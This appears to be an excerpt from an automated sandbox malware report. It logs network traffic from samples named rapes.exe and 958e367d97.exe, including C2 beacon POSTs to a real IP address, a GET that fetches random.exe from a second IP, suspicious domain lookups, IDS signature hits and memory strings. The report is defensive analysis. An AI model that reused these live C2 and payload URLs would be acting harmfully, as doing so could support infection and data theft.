Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 176.113.115.7 176.113.115.7

Source: Joe Sandbox View

ASN Name: SELECTELRU SELECTELRU

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49804 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49778 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49764 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49772 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49790 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49796 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49802 -> 104.73.234.102:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49766 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49783 -> 104.21.16.1:443

Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

Code function: 10_2_004605B0 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

10_2_004605B0

Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /files/qqdoup/random.exe HTTP/1.1Host: 176.113.115.7

Source: 958e367d97.exe, 0000000D.00000003.2747723485.0000000000994000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: 958e367d97.exe, 0000000D.00000003.2747723485.0000000000965000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cee2785c8bce6018c958b21f685c19e5c; path=/; secure; HttpOnly; SameSite=Nonesessionid=176a26b3bbd19f722a061d45; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35720Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveThu, 13 Mar 2025 07:22:18 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control9 equals www.youtube.com (Youtube)
Source: 958e367d97.exe, 0000000D.00000003.2747723485.0000000000965000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: cocjkoonpillow.today
Source: global traffic	DNS traffic detected: DNS query: featureccus.shop
Source: global traffic	DNS traffic detected: DNS query: mrodularmall.top
Source: global traffic	DNS traffic detected: DNS query: jowinjoinery.icu
Source: global traffic	DNS traffic detected: DNS query: legenassedk.top
Source: global traffic	DNS traffic detected: DNS query: htardwarehu.icu
Source: global traffic	DNS traffic detected: DNS query: cjlaspcorne.icu
Source: global traffic	DNS traffic detected: DNS query: bugildbett.top
Source: global traffic	DNS traffic detected: DNS query: latchclan.shop
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: exploreth.shop

Source: unknown

HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: 958e367d97.exe, 0000000D.00000003.2747723485.0000000000965000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: rapes.exe, 0000000A.00000003.2107434916.0000000000E69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9
Source: rapes.exe, 0000000A.00000003.2107434916.0000000000E69000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000A.00000002.3624177029.0000000000E8F000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000A.00000003.2107357869.0000000000E85000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000A.00000002.3624177029.0000000000E60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.php
Source: rapes.exe, 0000000A.00000002.3624177029.0000000000E8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.php2D
Source: rapes.exe, 0000000A.00000002.3624177029.0000000000E8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.php6
Source: rapes.exe, 0000000A.00000002.3624177029.0000000000E8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.php=
Source: rapes.exe, 0000000A.00000002.3624177029.0000000000E8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpB
Source: rapes.exe, 0000000A.00000003.2107434916.0000000000E69000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000A.00000002.3624177029.0000000000E60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpG
Source: rapes.exe, 0000000A.00000003.2107434916.0000000000E69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpJ
Source: rapes.exe, 0000000A.00000003.2107357869.0000000000E85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpPD
Source: rapes.exe, 0000000A.00000002.3624177029.0000000000E8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpU
Source: rapes.exe, 0000000A.00000002.3624177029.0000000000E8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpX_
Source: rapes.exe, 0000000A.00000003.2107434916.0000000000E69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpm
Source: rapes.exe, 0000000A.00000003.2107434916.0000000000E69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6h
Source: rapes.exe, 0000000A.00000002.3624177029.0000000000E60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/qqdoup/random.exe
Source: rapes.exe, 0000000A.00000002.3624177029.0000000000E60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/qqdoup/random.exe27E
Source: rapes.exe, 0000000A.00000002.3624177029.0000000000E60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/qqdoup/random.exe2s
Source: rapes.exe, 0000000A.00000002.3624177029.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/qqdoup/random.exef
Source: rapes.exe, 0000000A.00000002.3624177029.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/qqdoup/random.exep
Source: 958e367d97.exe, 0000000D.00000002.2779133231.000000000091C000.00000004.00000020.00020000.00000000.sdmp, 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: 958e367d97.exe, 0000000D.00000002.2779133231.000000000091C000.00000004.00000020.00020000.00000000.sdmp, 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: 958e367d97.exe, 0000000D.00000002.2779133231.000000000091C000.00000004.00000020.00020000.00000000.sdmp, 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 958e367d97.exe, 0000000D.00000003.2747723485.0000000000965000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: 958e367d97.exe, 0000000D.00000003.2747723485.0000000000965000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: 958e367d97.exe, 0000000D.00000003.2747723485.0000000000965000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: 958e367d97.exe, 0000000D.00000003.2747723485.0000000000965000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fas
Source: 958e367d97.exe, 0000000D.00000003.2747723485.0000000000965000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/
Source: 958e367d97.exe, 0000000D.00000003.2748143842.000000000091F000.00000004.00000020.00020000.00000000.sdmp, 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=J1-T6FXbrr0Z&a
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=GlKQ1cghJWE2&l=english&_c
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: 958e367d97.exe, 0000000D.00000003.2748143842.000000000091F000.00000004.00000020.00020000.00000000.sdmp, 958e367d97.exe, 0000000D.00000003.2747615213.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, 958e367d97.exe, 0000000D.00000002.2779133231.0000000000920000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
